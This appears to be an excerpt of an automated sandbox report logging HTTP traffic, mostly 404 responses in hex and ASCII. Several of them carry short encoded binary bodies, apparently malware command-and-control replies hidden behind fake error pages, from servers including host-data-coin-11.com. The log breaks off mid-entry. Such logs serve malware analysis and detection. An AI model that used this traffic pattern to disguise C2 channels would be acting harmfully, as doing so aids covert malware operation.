                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:23:44 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 